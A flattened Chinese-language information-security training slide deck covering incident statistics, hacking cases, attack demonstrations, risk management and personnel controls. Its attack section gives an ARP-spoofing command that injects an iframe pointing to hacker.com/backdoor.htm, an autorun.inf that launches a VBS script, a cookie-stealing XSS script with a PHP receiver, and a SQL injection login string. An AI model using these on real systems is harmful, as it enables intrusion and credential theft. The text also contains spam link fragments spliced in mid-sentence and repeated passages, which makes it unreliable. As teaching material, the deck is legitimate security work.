信息安全风险及分析

个人介绍高显嵩 工作经历： 中国“互联网信息安全与政府监管”专家组成员 中国法证技术研究组成员 北京司法局电子数据鉴定协会理事 北京广播电视大学特聘专家 原微软公司的技术支持工程师 项目背景 劳动部全国民办中介机构信用等级评定系统 劳动部全国知识竞赛评分系统 劳动部七个功能平台合并 方案 气瓶 现场处置方案 .pdf气瓶 现场处置方案 .doc见习基地管理方案.doc关于群访事件的化解方案建筑工地扬尘治理专项方案下载 北京统计局的报表打印系统 北京电大一站式平台合并的规划及实施 为考研在线提供整体安全解决方安及实施 为国家电力部内部网络设计安全解决方安及实施 鞍山移动公司网络规划 长期负责北京市安全局国家安全部内部技术培训 负责华彬大厦的整个网络规划及实施 美国百麦公司北京分公司的整个网络规划及实施主要内容 信息安全的重要性 信息安全问 题 快递公司问题件快递公司问题件货款处理关于圆的周长面积重点题型关于解方程组的题及答案关于南海问题 分析 信息安全管理概述 信息安全风险管理 信息安全人员管理信息安全重要性当前我国网络信息安全的状况 网络及计算机病毒传播泛滥 垃圾邮件和病毒邮件泛滥 黑客攻击事件频繁 用户的个人隐私及计算机的使用权受到侵犯 网络犯罪事件频繁监管力度不够 涉及版权问题的事件增多 没有统一完善的适合国情的安全 标准 excel标准偏差excel标准偏差函数exl标准差函数国标检验抽样标准表免费下载红头文件格式标准下载 及法规 没有职责分明的管理部门或管理小组 制约与网络基础设施和技术环境 安全体系不健全 全民安全意识及计算机网络知识薄弱CERT有关信息安全的统计http://www.cert.org/stats/cert_stats.htmlChart1 6 132 252 406 773 1334 2340 2412 2573 2134 3734 9859 21756 52658 82094 137529安全事件统计Sheet1 安全事件统计 1988 6 1989 132 1990 252 1991 406 1992 773 1993 1334 1994 2340 1995 2412 1996 2573 1997 2134 1998 3734 1999 9859 2000 21756 2001 52658 2002 82094 2003 137529 若要调整图表数据区域的大小，请拖拽区域的右下角。http://www.cert.org/stats/cert_stats.htmlCERT有关信息安全的统计Chart1 539 2869 4448 9629 14463 21267 29680 32084 31268 39626 41871 34612 56365 118907 204841 542754 717863 624634 674235电子邮件安全统计电子邮件安全统计Sheet1 1988 1989 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 电子邮件安全统计 539 2869 4448 9629 14463 21267 29680 32084 31268 39626 41871 34612 56365 118907 204841 542754 717863 624634 674235CERT有关信息安全的统计http://www.cert.org/stats/cert_stats.htmlChart1 171 345 311 262 417 1090 2437 4129 3784 3780 5990 8064 7236 6058脆弱点统计Sheet1 脆弱点统计 1995 171 1996 345 1997 311 1998 262 1999 417 2000 1090 2001 2437 2002 4129 2003 3784 2004 3780 2005 5990 2006 8064 2007 7236 2008Q1-Q3 6058 若要调整图表数据区域的大小，请拖拽区域的右下角。网络病毒传播泛滥 据2001年调查，我国约73%的计算机用户曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用户高达59%，而且病毒的破坏性较大，被病毒破坏全部数据的占14%，破坏部分数据的占57%。 对病毒的预防和发现速度相对缓慢 垃圾邮件及病毒邮件泛滥黑客离我们很近 1996年信息安全数据显示，世界上平均每２０秒就有一起黑客事件发生，无论是政府机构、军事部门，还是各大银行、大公司，只要与互联网接轨，就难逃黑客的“黑手”。 据美国网络安全公司Sophos发布的报告显示，在2008年第一季度，平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。 中国网民每年被网络黑客“黑”掉76亿元。FBI计算机犯罪调查报告 2002年503家机构中，有60%受到了攻击 2002年其中223家（占503家的44%）损失的总和达到$4.55848亿 2003年530家机构中有75%（398家）在年内受到了攻击 2003年251家（占530家的47%）的经济损失总和为$2.01799734亿全球信息安全损失数额： 年份 损失额 1999 36亿美元 2000 42亿美元 2001 129亿美元 2002 超过200亿美元 2003 超过280亿美元中国已成为全球黑客的第三大来源地有关统计数据显示，目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入，受害涉及的覆盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出，中国甚至已经成为全球黑客的第三大来源地，竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面，我国却缺乏像西方发达国家那样健全的防范措施。2003年黑客事件 中韩新人王网上对抗遭黑客入侵推迟10多分钟中韩围棋新人王对抗赛在中国的新浪网和韩国ｃｙｂｅｒ网站落子，孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前，由于有人以孔杰的名字入侵比赛的服务器，导致比赛推迟了１０多分钟才正常进行。2003年黑客事件 百度连续遭遇严重黑客攻击5月15日至5月18日，中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍，自5月15日22:00起，百度的检索量突然大增，此番增长并未引起工程师注意。5月16日，攻击更加强烈，每秒钟攻击次数搞到达1000次，同一个词被查询次数最多达38863次。据互联网技术专家介绍，每秒钟攻击100次就已经属于非常严重的攻击，而每秒钟1000次的攻击就实属罕见2003年黑客事件 263游戏论坛遭黑客攻击关闭2004年黑客事件 腾讯服务器被攻击　　10月17日早上10时许，国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露，一国内团体，利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用，腾讯QQ不予理睬后，该组织于17日正式发动攻击，腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速，业内有部分安全管理人士称网络进入软件绑架勒索时代。2004年黑客事件 江民网站被攻击　　2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一名为河马史诗的黑客攻破，页面内容被篡改。　　攻击缘由：江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”，用户在江民公司的官方论坛发反映后，江民没有做出及时的回复，也没能在短时间内解决用户的问题。2005年黑客事件频繁也许你的计算机正在被当作从事违法犯罪活动的工具，而当这些悄悄发生的时候，你却一无所知，因为你的电脑已经成为被别人控制的“僵尸电脑”。2005年黑客事件 国内首起僵尸网络事件今年27岁的徐立系唐山市某企业工人，其利用某些手段在互联网上传播其编写的特定程序，先后植入4万余台计算机，形成了中国首例BOTNET“僵尸网络。2004年10月至2005年1月，徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网（简称酷乐），发动多次攻击，致使该公司蒙受重大经济损失，并导致北京电信数据中心某机房网络设备大面积瘫痪。2006年黑客事件 2006年12月31日中国工商银行被黑 06年的最后一天，很多网友都收到一些号称“工行要倒闭，所有存款均没收”之类的新闻链接，地址都是正牌的icbc.com.cn，而不是盗版的1cbc.com.cn。原来工商被黑客入侵，截止当天晚上11点，发现此漏洞已经修改好。07年第一黑客事件 深圳律师网被黑 当进入该网站之后，就发生事故了，发现，已经被黑. 主要有以下字样： 天空未留痕迹,鸟儿却已飞过. 网络亦是虚拟,疯狂亦是叛逆........~~~尊敬的網站管理員您好~~~....... ..............台湾是中国的，日本是吃S的.............. .............如果你是中国人............. .........请保留此页几天谢谢!.........少年★浪子所向披靡OICQ11888956例子：得到本地登录密码 Pulist.exe+findpass.exe PasswordReminder.exe例子：记录本地登录密码 GINAPassWordSniffer例子得到远程计算机的密码 IpcScan2.0例子：更改本地管理员密码 WindowsNT/2000/XP/2003/Linux/Unix系统，本地接触可以更改任意用户的密码。 一张软盘更改本地管理员密码Ntpassword 一张光盘更改本地管理员密码ERDCommander2003例子：ERDCOMMANDER例子：ERDCOMMANDER例子：得到他人的邮件密码 密码监听器2.8例子：内网渗透ZXARPS.EXE 内网主机访问任意站点被入侵 指定的IP段中的用户访问的所有网站都插入一个框架代码zxarps.exe-idx0-ip192.168.0.2-192.168.0.99-port80-insert"<iframesrc=‘http://hacker.com/backdoor.htm'width=0height=0>"ARP协议工作原理ARP欺骗交换机ARP欺骗计算机例子：内网U盘感染 U盘在互联网和局域网内交叉使用文件被盗取 Autorun.infautorun风暴[autorun]open=shell\open=打开(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=资源管理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs例子：查看网络内任何人的上网记录 any@web2.54可以记录同一局域网内任何计算机上浏览的网页内容，察看的邮箱内容，登陆的ftp的内容。用Outlook或者OutlookExpress接受的全部邮件都回同时被该软件接收。例子：查看MSN密码例子：察看星号密码例子：读取缓存密码例子：控制他人计算机 Dameware4.5 RemoteAdministrator2.1是一种网络管理软件，但是经常被黑客利用来远程控制和管理，被入侵者的计算机。例子：打开对方摄像头和语音SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击XSS跨站脚本构建了个Javascript脚本传递客户端的cookie到黑客的服务器Javascript脚本可以简单的这样写varimg=newImage();img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);然后服务器端使用PHP简单写了个脚本保存Cookie数据<?phpif(isset($_GET[‘var’])){  file_put_contents(‘./cookie/’.time().‘.txt’,urldecode($_GET[‘var’]));}?>构造SQL登陆语句用户名:admin密码:1’or‘1’=‘1其他例子 击键记录 Office文档挂栽木马 网页木马 木马捆绑信息安全管理概述 例一： 局域网内病毒泛滥成灾。 例二： 网络中为什么会有ARP欺骗的问题发生 例三： 局域网内计算机故障频繁发生 例四： 为什么要给每个用户管理员权限先来分析两个例子技术和管理孰重孰轻的争论由来已久，从来没有停止过；管理人员和技术人员对这个问题的错误看法严重影响信息安全工作；举例摄影届关于两头的争论， 说明 关于失联党员情况说明岗位说明总经理岗位说明书会计岗位说明书行政主管岗位说明书 人是信息安全中最关键的因素。 信息安全的成败取决于两个因素：技术和管理。 技术是信息安全的构筑材料，管理是真正的粘合剂和催化剂。 人们常说，三分技术，七分管理，可见管理对信息安全的重要性。 信息安全管理（InformationSecurityManagement）作为组织完整的管理体系中一个重要的环节，它构成了信息安全具有能动性的部分，是指导和控制组织的关于信息安全风险的相互协调的活动，其针对对象就是组织的信息资产。 现实世界里大多数安全事件的发生和安全隐患的存在，与其说是技术上的原因，不如说是管理不善造成的，理解并重视管理对于信息安全的关键作用，对于真正实现信息安全目标来说尤其重要。什么是信息安全管理？技术和管理孰重孰轻的争论由来已久，从来没有停止过；管理人员和技术人员对这个问题的错误看法严重影响信息安全工作；举例摄影届关于两头的争论，说明人是信息安全中最关键的因素。信息安全管理模型著名的PDCA管理模型这不仅是信息安全管理的基本方法，也是所有管理活动应遵循的方法，由此可见信息安全管理是机构管理不可分割的有机组成部分；叙述各部分的作用和基本工作内容，说明信息安全工作是一个不断改进的工作过程，而不可能是一蹴而就的；信息安全管理工作也应该引入能力成熟度的概念。 信息安全必须从整体考虑，必须做到“有计划有目标、发现问题、分析问题、采取措施解决问题、后续监督避免再现”这样全程管理的思路，这就要求建立的是一套完整的信息安全管理体系，这样的系统工程，只有处于组织最高管理者领导和支持之下，才可能成功 最高管理层通过明确信息安全目标和方针为信息安全活动指引方向 最高管理层能够为信息安全活动提供必要的资源支持 最高管理层能够在重大问题上做出决策 最高管理层可以协调组织不同单位不同环节的关系，提升促动力 说到底，最高管理者是组织信息安全的最终责任人组织高管全面负责信息安全管理没有高级管理层对安全问题的正确理解和有力支持，信息安全工作是很难正常开展的；信息安全管理人员也应经常站在管理管理层的角度思考问题，在CISSP考试中也是这样；信息安全管理的能力取决于公司治理水平；信息安全管理专业人员应该有能力、有行动影响高官，帮助其形成信息安全管理的正确观念。 制定有效的安全管理计划，可以确保信息安全策略得到恰当执行 进行有效安全管理的途径，应该是自上而下的（Top-Down）： 最高管理层负责启动并定义组织的安全方针 管理中层负责将安全策略充实成标准、基线、指南和程序，并监督执行 业务经理或安全专家负责实施安全管理文件中的指定配置 最终用户负责遵守组织所有的安全策略 安全管理计划小组应该开发三类计划： 战略计划（strategicplan）是长期计划（例如5年），相对稳定，定义了组织的目标和使命 战术计划（tacticalplan）是中期计划（例如1年），是对实现战略计划中既定目标的任务和进度的细节描述，例如雇用计划、预算计划、维护计划、系统开发计划等 操作计划（operationalplan）是短期的高度细化的计划，须经常更新（每月或每季度），例如培训计划、系统部署计划、产品设计计划等按计划行事10:40左右结束，休息10分钟计划是对各种活动进行规划和安排的活动和文档，通过计划进行管理的现代管理的基本方法；自下而上是一种理想的安全管理推行模式，不过实际工作中经常是自下而上的；从最高管理者到一般用户在计划的制定和实施过程中有各自的责任，并非都是安全专业人员在责任；计划的制定应该有层次性，层次关系应该明确、顺畅。 数据收集者（DataCollector）对数据主体（DataSubject）：准确（Accuracy）、隐私（Privacy）； 数据保管者（DataCustodian）对数据拥有者（DataOwner）：可用性（Availability）、完整性（Integrity）、保密性（Confidentiality）； 数据用户（DataUsers）对拥有者/主体（Owner/Subject）：保密性（Confidentiality）和完整性； 系统用户（SystemUsers）对系统拥有者（SystemOwner）：可用性（Availability）和软件完整性（SoftwareIntegrity）； 系统管理者（SystemManager）对用户（Users），可用性（Integrity）、完整性（Integrity）； 用户（Users）对其它用户（OtherUsers）：可用性（Availability）。重要角色和职责信息安全管风险管理风险风险管理（RiskManagement）就是识别风险、评估风险、采取措施将风险减少到可接受水平，并维持这个风险水平的过程。风险管理是信息安全管理的核心内容。在信息安全领域，风险（Risk）就是指信息资产遭受损坏并给企业带来负面影响的潜在可能性。风险管理风险管理概述风险举例：敏感信息泄漏导致机构市场能力遭到损害的风险；重要信息被篡改导致资金损失的风险；信息系统设备丢失或被损坏导致财产损失的风险；信息系统故障造成业务中断的风险；信息资产面临的风险有很多；信息安全管理从本质上就是对信息资产的风险进行管理，所以风险管理的概念和方法在信息安全工作中将贯彻始终，是最核心的信息安全方法。 资产（Asset）——对组织具有价值的信息资产，包括计算机硬件、通信设施、数据库、文档信息、软件、信息服务和人员等，所有这些资产都需要妥善保护。 威胁（Threat）——可能对资产或组织造成损害的某种安全事件发生的潜在原因，需要识别出威胁源（Threatsource）或威胁代理（Threatagent）。 弱点（Vulnerability）——也被称作漏洞或脆弱性，即资产或资产组中存在的可被威胁利用的缺点，弱点一旦被利用，就可能对资产造成损害。 风险（Risk）——特定威胁利用资产弱点给资产或资产组带来损害的潜在可能性。 可能性（Likelihood）——对威胁发生几率（Probability）或频率（Frequency）的定性描述。 影响（Impact）——后果（Consequence），意外事件发生给组织带来的直接或间接的损失或伤害。 安全措施（Safeguard）——控制（control）或对策（countermeasure），即通过防范威胁、减少弱点、限制意外事件带来影响等途径来消减风险的机制、方法和措施。 残留风险（ResidualRisk）——在实施安全措施之后仍然存在的风险。风险管理相关要素逐一解释个概念的含义。风险管理的目标威胁、弱点、资产的减少都会导致风险的降低；减少弱点是信息安全的主要工作，也是大家容易理解和意识到的；规避威胁也是重要的风险消减手段，比如将设施建设在威胁较少的环境中；减少资产对攻击者的吸引力也是一种手段，比如建筑物和设备外观等。关键是达成成本利益的平衡信息安全是为机构使命和业务目标服务的，成本效益原则是风险评估的一项基本原则，所有的安全控制措施都应进行成本效益分析，过度保护与保护不力一样会被追究责任。风险管理的一般过程我们要保护什么资产？这些资产可能遭受哪些风险？已经有哪些控制措施？剩余风险是否能够被接受？有哪些剩余风险不能接受？通过什么措施消减这些无法接受的剩余风险？这些措施的成本效益如何？每一种威胁给每一项资产带来的每一种风险及其控制措施和剩余风险都应予以识别和评价，最后进行总体评价。 风险评估（RiskAssessment）是对信息资产及其价值、面临的威胁、存在的弱点，以及三者综合作用而带来风险的大小或水平的评估。 作为风险管理的基础，风险评估是组织确定信息安全需求的一个重要途径，属于组织信息安全管理体系策划的过程。主要任务包括： 识别构成风险的各种因素 评估风险发生的可能性和造成的影响，并最终评价风险水平或大小 确定组织承受风险的能力 确定风险消减和控制的策略、目标和优先顺序 推荐风险消减对策以供实施 包括风险分析（RiskAnalysis）和风险评价（RiskEvaluation）两部分，但一般来说，风险评估和风险分析同义。什么是风险评估？风险分析是风险管理的控制性步骤，是进行有效风险消减的前提，也是风险管理工作的难点；解释风险评估的主要任务；风险评价是根据风险分析结果和机构的风险承受能力确定有哪些风险无法接受，提出消减的建议；风险分析经常与风险评估混用； 降低风险（ReduceRisk）——实施有效控制，将风险降低到可接受的程度，实际上就是力图减小威胁发生的可能性和带来的影响，包括： 减少威胁：例如，实施恶意软件控制程序，减少信息系统受恶意软件攻击的机会 减少弱点：例如，通过安全意识培训，强化职员的安全意识与安全操作能力 降低影响：例如，制定灾难恢复计划和业务连续性计划，做好备份 规避风险（AvoidRisk）——或者RejectingRisk。有时候，组织可以选择放弃某些可能引来风险的业务或资产，以此规避风险。例如，将重要的计算机系统与互联网隔离，使其免遭来自外部网络的攻击。 转嫁风险（TransferRisk）——也称作RiskAssignment。将风险全部或者部分地转移到其他责任方，例如购买商业保险。 接受风险（AcceptRisk）——在实施了其他风险应对措施之后，对于残留的风险，组织可以选择接受。确定风险消减策略降低风险是信息安全管理的主要工作；减少威胁：对员工进行背景调查，进行保密教育和签订保密协议，实施职务分离、工作轮换、强制假期等人员控制措施，异常情况的内部报告制度；减少弱点：加强信息系统输出控制，采用防泄密的技术措施，加强设施的物理控制；降低影响：建立安全事件响应和处理机制，及时发现异常情况，采取措施，如调整市场计划和价格政策、获得有力证据后对相关人员和机构采取法律行动，改进控制措施防止此类事件再次发生等；我国实施的“物理隔离”就是规避风险的一种措施，由于业务活动的要求，不是所有的风险都可以规避；国内保险品种较少，这方面的选择多是对固定资产损失风险的转移；低风险和中等风险有时可以接受。 绝对安全（即零风险）是不可能的。 实施安全控制后会有残留风险或残存风险（ResidualRisk）。 为了实现信息安全，应该确保残留风险在可接受的范围内： 残留风险Rr＝原有风险R0－控制效力ΔR 残留风险Rr≤可接受的风险Rt 对残留风险进行确认和评价的过程其实就是风险接受的过程。决策者可以根据风险评估的结果来确定一个阀值，以该阀值作为是否接受残留风险的标准。评价残留风险要将残留风险控制在比较低的水平需增加控制措施的投入成本，如果决策者原因冒较高的风险就可以节省这些成本，这与企业或企业决策者的风险偏好有关，不过不管风险偏好如何，都应该符合适度谨慎和适度勤勉的管理原则；比如如果将中等风险降低为低风险需要付出很大的控制成本，决策者可以选择接受中等风险，但如果将中等风险降低为低风险只需付出很少成本，决策者就应该选择将风险降低到低风险。信息安全人员管理 人是信息安全的关键因素，人员管理不善会给组织带来非常大的安全威胁和风险。 有调查显示，大多数重大信息安全事件通常都来自组织内部，例如，员工受利益驱使将公司技术图纸出卖给竞争对手，利用内部系统从事经济犯罪活动，或者由于缺乏安全意识或操作技能而导致误操作，引起信息系统故障等。 为降低内部员工所带来的人为差错、盗窃、欺诈及滥用设施的风险，并且避免引发法律风险，组织应该采取措施，加强内部人员的安全管理： 对工作申请者实施背景检查 签署雇用 合同 劳动合同范本免费下载装修合同范本免费下载租赁合同免费下载房屋买卖合同下载劳务合同范本下载 和保密协议 加强在职人员的安全管理 严格控制人员离职程序必须高度重视人员安全问题简述人在信息安全中的关键性作用，包括内部人员对安全的威胁；人是安全保障的决定性因素，举例SOC的实践，所以人员的培训是最重要的安全控制措施之一，最后我们要讲到这个问题；人的安全问题是信息安全的首要问题，凡是由于信息系统故障或遭破坏可能导致人健康和生命损失的，这种系统安全性都应重点保护，任何安全措施都不应妨碍紧急情况下人的疏散，信息安全措施不应过度侵犯个人隐私； 背景检查是工作申请过程的一个部分，组织至少会审查申请人简历中的基本信息。对于敏感职位，可能还会考虑进一步的调查。调查过程中，组织可以请求访问申请人的信用和犯罪记录，甚至可以聘请外部公司对申请人进行调查，以确定是否存在潜在问题或利益冲突。 通过背景检查，可以防止： 因为人员解雇而导致法律诉讼 因为雇用疏忽而导致第三方的法律诉讼 雇用不合格的人员 丧失商业秘密 员工从一般岗位转入信息安全重要岗位，组织也应当对其进行检查，对于处在有相当权力位置的人员，这种检查应定期进行。背景检查（BACKGROUNDCHECK）背景调查的力度应与职务的敏感程度相当；保安等具有较高物理安全特权和系统管理人员等具有较高系统特权的人，以及其它能够接触到敏感信息的人都属于敏感岗位；不应雇佣有犯罪记录和非法攻击他人网络的黑客；第三方服务人员也应进行类似调查。 组织应与所有员工签订保密协议，作为雇用合同基本条款的一部分 保密协议应明确规定雇员对组织信息安全的责任、保密要求及违约的法律责任 签订保密承诺旨在加强员工对组织信息安全应承担的责任，协议上应有员工的签名并由其保存一份协议副本 对于处于试用期的新员工，要求其签订一份保密承诺 在允许第三方用户使用信息处理设施之前，要求其签订保密协议 当雇用期或合同期有更改，特别是雇员到期离职或合同终止时，应重申保密协议保密协议（CONFIDENTIALITYAGREEMENT）保密协议属于指导型控制，必须与其它控制手段配合才能达到一定的保护等级；保密协议可能在以后涉及的法律纠纷中有一定意义，但相关当事人承担的法律责任还是由现行法律而部署保密协议确定；所以只能将保密协议做为层次化防御体现的一个环节，而不是主要的防御措施，之所以机构常使用这种手段，原因在于这种手段的成本很低，具有成本效益。 职务分离（SeparationofDuties），将一个关键任务分成多个不同的部分，每个部分由不同的人执行。 共谋（Collusion），进行欺诈（Fraud）需要多个人共谋。 目的： 制约，减少人为破坏的几率。 补充，减少人为疏忽和错误的几率。职务分离Separationofduties(alsocalledsegregationofduties)assignspartsoftaskstodifferentpersonnel.Thus,ifnosinglepersonhastotalcontrolofthesystem’ssecuritymechanisms,thetheoryisthatnosinglepersoncancompletelycompromisethesystem.Inmanysystems,asystemadministratorhastotalcontrolofthesystem’sadministrationandsecurityfunctions.Thisconsolidationofprivilegeshouldnotbeallowedinasecuresystembecausesecuritytasksandfunctionsshouldnotautomaticallybeassignedtotheroleofthesystemadministrator.Inhighlysecuresystems,threedistinctadministrativerolesmightberequired:asystemadministrator,asecurityadministratorwhoisusuallyaninformationsystemsecurityofficer(ISSO),andanenhancedoperatorfunction.Thesecurityadministrator,systemadministrator,andoperatormightnotnecessarilybedifferentpersonnel.However,wheneverasystemadministratorassumestheroleofthesecurityadministrator,thisrolechangemustbecontrolledandaudited.Becausethesecurityadministrator’sjobistoperformsecurityfunctions,theperformanceofnon-securitytasksmustbestrictlylimited.Thisseparationofdutiesreducesthelikelihoodoflossthatresultsfromusersabusingtheirauthoritybytakingactionsoutsideoftheirassignedfunctionalresponsibilities.Whileitmightbecumbersomeforthepersontoswitchfromoneroletoanother,therolesarefunctionallydifferentandmustbeexecutedassuch.Intheconceptoftwo-mancontrol,twooperatorsreviewandapprovetheworkofeachother.Thepurposeoftwo-mancontrolistoprovideaccountabilityandtominimizefraudinhighlysensitiveorhigh-risktransactions.Theconceptofdualcontrolmeansthatbothoperatorsareneededtocompleteasensitivetask. 将操作人员（Operator）分割为分离角色（Roles）的原因是： 不同安全相关任务所需技能（Skills）不同 将管理员（Administrators）任务分成多个角色以赋予不同信任级别（Trustlevels） 防止将所有安全相关功能委托给一个角色或人员的需要 这些角色可以包括安全管理员（SecurityAdministrators）、安全操作员（SecurityOperators）、帐户管理员（AccountAdministrators）、审计员（Auditors）、操作员（Operators）、系统程序员（SystemProgrammers）等。操作人员的角色分离OperationsJobFunctionOverviewInalargeshop,jobfunctionsanddutiesmightbedividedamongaverylargebaseofITpersonnel.InmanyITdepartments,thefollowingrolesarecombinedintofewerpositions.Thefollowinglisting,however,givesaniceoverviewofthevarioustaskcomponentsoftheoperationalfunctions.ComputerOperator.Responsibleforbackups,runningthesystemconsole,mountingandunmountingreeltapesandcartridges,recordingandreportingoperationalproblemswithhardwaredevicesandsoftwareproducts,andmaintainingenvironmentalcontrolsOperationsAnalyst.Responsibleforworkingwithapplicationsoftwaredevelopers,maintenanceprogrammers,andcomputeroperatorsJobControlAnalyst.ResponsiblefortheoverallqualityoftheproductionjobcontrollanguageandconformancetostandardsProductionScheduler.Responsibleforplanning,creating,andcoordinatingcomputerprocessingschedulesforallproductionandjobstreamsinconjunctionwiththeestablishedprocessingperiodsandcalendarsProductionControlAnalyst.Responsiblefortheprintinganddistributionofcomputerreportsandmicrofiche/microfilmrecordsTapeLibrarian.Responsibleforcollectinginputtapesandscratchtapes,sendingtapestoandreceivingreturnsfromoffsitestorageandthirdparties,andformaintainingtapes 一个人担任某个职位的时间不能过长 避免过度控制（ExcessiveControl）造成欺诈（Fraud）的便利 继任人员可能发现前任问题形成制约 工作轮换（JobRotation），有不止一个人能够完成该职位所规定的工作 提供人员的备份（Backup）和冗余（Redundancy）工作轮换Anothervariationontheseparationofdutiesiscalledrotationofduties,whichisdefinedastheprocessoflimitingtheamountoftimethatanoperatorisassignedtoperformasecurity-relatedtaskbeforebeingmovedtoadifferenttaskwithadifferentsecurityclassification.Thiscontrollessenstheopportunityforcollusionbetweenoperatorsforfraudulentpurposes.Likeaseparationofduties,arotationofdutiesmightbedifficulttoimplementinsmallorganizationsbutcanbeaneffectivesecuritycontrolprocedure. 强制假期（MandatoryVacation）具有强制性，在休假期间对休假人进行审计（Audit）以便发现可能存在的问题。 强制假期（MandatoryVacation）具有突然性（Unexpected），使欺诈者（Fraud）没有时间来掩盖欺诈痕迹。 欺诈者为了避免他人发现其行为，可能长期主动放弃休假。强制假期Mandatoryvacationsareanothertypeofadministrativecontrol,thoughthenamemaysoundabitoddatfirst.Thereasonstomakesurethatemployeestaketheirvacationsincludebeingabletoidentifyfraudulentactivitiesandenablingjobrotationtotakeplace.Ifanaccountingemployeehasbeenperformingasalamiattackbyshavingoffpenniesfrommultipleaccountsandputtingthemoneyintohisownaccount,acompanywouldhaveabetterchanceoffiguringthisoutifthatemployeeisrequiredtotakeavacationforaweekorlonger.Whentheemployeeisonvacation,anotheremployeehastofillin.Shemightuncoverquestionabledocumentsandcluesofpreviousactivities,orthecompanymayseeachangeincertainpatternsoncetheemployeewhoiscommittingfraudisgoneforaweekortwo.Itisbestforauditingpurposesiftheemployeetakestwocontiguousweeksofffromwork.Thebeliefisthatanorganizationcanoftendowithouttheservicesofanemployeeforaweekwithoutrequiringsomeonetotakeovertheirwork.Ifthisisalsothecaseforatwo-weekabsence,theremaybeotherquestionsthatshouldbediscussedregardingthatoverallposition.Again,theideabehindmandatoryvacationsisthat,traditionally,thoseemployeeswhohavecommittedfraudareusuallytheoneswhohaveresistedgoingonvacationbecauseoftheirfearofbeingfoundoutwhileaway. 人员离职往往存在安全风险，特别是雇员主动辞职时 解雇通知应选择恰当的时机，例如重要项目结束，或新项目启动前 使用标准的检查列表（Checklist）来实施离职访谈 离职者需在陪同下清理个人物品 确保离职者返还所有的公司证章、ID、钥匙等物品 与此同时，立即消除离职者的访问权限，包括： 解除对系统、网络和物理设施的访问权 解除电话，注销电子邮箱，锁定Internet账号 通知外部伙伴或客户，声明此人已离职人员离职（TERMINATION）离职可分为友好离职和非友好离职，非友好离职的员工对机构进行攻击的可能性比较大，所以应采取更有效的离职规程；机构应尽量避免出现非友好离职的情况，即使出现了这种情况，也应积极努力化解对方的不满情绪，对于敏感岗位员工应该多关注和关心，举例某女性数据库管理员应不满公司进行攻击的事件；离职情况通报（尤其是非友好离职）和提高员工安全意识也很重要，举例某管理员离职后请其它员工帮助进入设施的例子。谢谢大家！讨论！！技术和管理孰重孰轻的争论由来已久，从来没有停止过；管理人员和技术人员对这个问题的错误看法严重影响信息安全工作；举例摄影届关于两头的争论，说明人是信息安全中最关键的因素。技术和管理孰重孰轻的争论由来已久，从来没有停止过；管理人员和技术人员对这个问题的错误看法严重影响信息安全工作；举例摄影届关于两头的争论，说明人是信息安全中最关键的因素。著名的PDCA管理模型这不仅是信息安全管理的基本方法，也是所有管理活动应遵循的方法，由此可见信息安全管理是机构管理不可分割的有机组成部分；叙述各部分的作用和基本工作内容，说明信息安全工作是一个不断改进的工作过程，而不可能是一蹴而就的；信息安全管理工作也应该引入能力成熟度的概念。没有高级管理层对安全问题的正确理解和有力支持，信息安全工作是很难正常开展的；信息安全管理人员也应经常站在管理管理层的角度思考问题，在CISSP考试中也是这样；信息安全管理的能力取决于公司治理水平；信息安全管理专业人员应该有能力、有行动影响高官，帮助其形成信息安全管理的正确观念。10:40左右结束，休息10分钟计划是对各种活动进行规划和安排的活动和文档，通过计划进行管理的现代管理的基本方法；自下而上是一种理想的安全管理推行模式，不过实际工作中经常是自下而上的；从最高管理者到一般用户在计划的制定和实施过程中有各自的责任，并非都是安全专业人员在责任；计划的制定应该有层次性，层次关系应该明确、顺畅。风险举例：敏感信息泄漏导致机构市场能力遭到损害的风险；重要信息被篡改导致资金损失的风险；信息系统设备丢失或被损坏导致财产损失的风险；信息系统故障造成业务中断的风险；信息资产面临的风险有很多；信息安全管理从本质上就是对信息资产的风险进行管理，所以风险管理的概念和方法在信息安全工作中将贯彻始终，是最核心的信息安全方法。逐一解释个概念的含义。威胁、弱点、资产的减少都会导致风险的降低；减少弱点是信息安全的主要工作，也是大家容易理解和意识到的；规避威胁也是重要的风险消减手段，比如将设施建设在威胁较少的环境中；减少资产对攻击者的吸引力也是一种手段，比如建筑物和设备外观等。信息安全是为机构使命和业务目标服务的，成本效益原则是风险评估的一项基本原则，所有的安全控制措施都应进行成本效益分析，过度保护与保护不力一样会被追究责任。我们要保护什么资产？这些资产可能遭受哪些风险？已经有哪些控制措施？剩余风险是否能够被接受？有哪些剩余风险不能接受？通过什么措施消减这些无法接受的剩余风险？这些措施的成本效益如何？每一种威胁给每一项资产带来的每一种风险及其控制措施和剩余风险都应予以识别和评价，最后进行总体评价。风险分析是风险管理的控制性步骤，是进行有效风险消减的前提，也是风险管理工作的难点；解释风险评估的主要任务；风险评价是根据风险分析结果和机构的风险承受能力确定有哪些风险无法接受，提出消减的建议；风险分析经常与风险评估混用；降低风险是信息安全管理的主要工作；减少威胁：对员工进行背景调查，进行保密教育和签订保密协议，实施职务分离、工作轮换、强制假期等人员控制措施，异常情况的内部报告制度；减少弱点：加强信息系统输出控制，采用防泄密的技术措施，加强设施的物理控制；降低影响：建立安全事件响应和处理机制，及时发现异常情况，采取措施，如调整市场计划和价格政策、获得有力证据后对相关人员